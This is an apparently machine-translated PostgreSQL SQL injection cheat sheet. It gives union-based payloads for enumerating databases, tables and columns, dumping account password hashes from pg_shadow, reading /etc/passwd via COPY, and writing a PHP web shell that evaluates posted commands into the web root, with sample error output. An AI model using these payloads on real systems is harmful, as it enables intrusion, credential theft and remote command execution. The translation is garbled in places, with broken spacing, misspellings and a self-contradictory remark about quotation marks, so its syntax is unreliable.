Postgresql injection syntax Guide

There are usually several injection syntaxes commonly used in injection: -- display version -- data explosion from a known table segment field -- column library -- table segment in the column database -- field in the list segment -- read configuration information, for example, to log on to the database account and password-read and write files, I will talk about the Postgresql syntax one by one.
-- Display version

1. Select version ();
2. Union select 1, 2,... n, version ()
3. // The version () function is the same as that of MySQL.

######################################## ######################################## ###########

Example of echo data: PostgreSQL 8.1.18 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-46)
-- Data explosion from a known table segment Field

1. Select aa from bb where cc = dd;
2. Union select 1, 2,... n, aa from bb where cc = dd
3. // Almost all SQL syntaxes use these syntaxes to kill data.

######################################## ######################################## ###########

No example
-- Column Library

1. Select datname from pg_database;
2. Union select 1, 2,..., n, datname from pg_database;

######################################## ######################################## ###########

Echo example: ipvs, prc, template1, template0
-- Column table segments in the database

1. Select relname from pg_stat_user_tables limit 1 offset n;
2. // Similar to information_schema.tables in MySQL, although not appropriate
3. Union select relname from pg_stat_user_tables limit 1 offset 3;
4. // Limit 1 offset 0 and MySQL limit 0 and 1.

######################################## ######################################## ###########

No example
-- Fields in the list segment

1. Select column_name from information_schema.columns where table_name = 'xxx' limit 1 offset n;
2. Union select 1, 2,..., n, column_name from information_schema.columns where table_name = 0x3a limit 1 offset 5

######################################## ######################################## ###########

// Same as MySQL
-- Read configuration information, such as database login account and password

1. Select usename, passwd from pg_shadow;
2. Union select 1, 2,... n, usename, passwd from pg_shadow
3. // The pg_shadow database is similar to the MySQL database in mysql.

######################################## ######################################## ###########

For example, postgres 9d2e7638fd7c7e433f0074a8f65cfd3a
-- Read files

1. Create table test (code text );
2. Copy test from '/etc/passwd' with delimiter E' \ T ';
3. (Note: Most Postgresql statements on the Internet contain double quotation marks. In actual tests, 8. x to 9. x double quotation marks are invalid. Double quotation marks should be used)

######################################## ######################################## ###########

Echo example: Query failed: ERROR: extra data after last expected column CONTEXT: COPY file, line 1: "root: x: 0: 0: root:/root: /bin/bash"
-- Write files

1. Insert into test values ('<? Php eval ($ _ POST ["cmd"];?> ');
2. Copy test (code) to "/var/www/one. php ";

######################################## ######################################## ###########

Echo example: Query failed: ERROR: cocould not open file "/var/www/html/aaa. php "for writing: Permission denied pg_file_read () is not as useful as load_file () in MySQL. for example:

1. Select pg_file_read ('pg _ hba. conf', 1, pg_file_length ('pg _ hb. conf '));

######################################## ######################################## ###########

Then ECHO: Query failed: ERROR: function pg_file_length ("unknown") does not exist HINT: No function matches the given name and argument types. You may need to add explicit type casts.
I am not familiar with Postgresql either, so I wrote it here.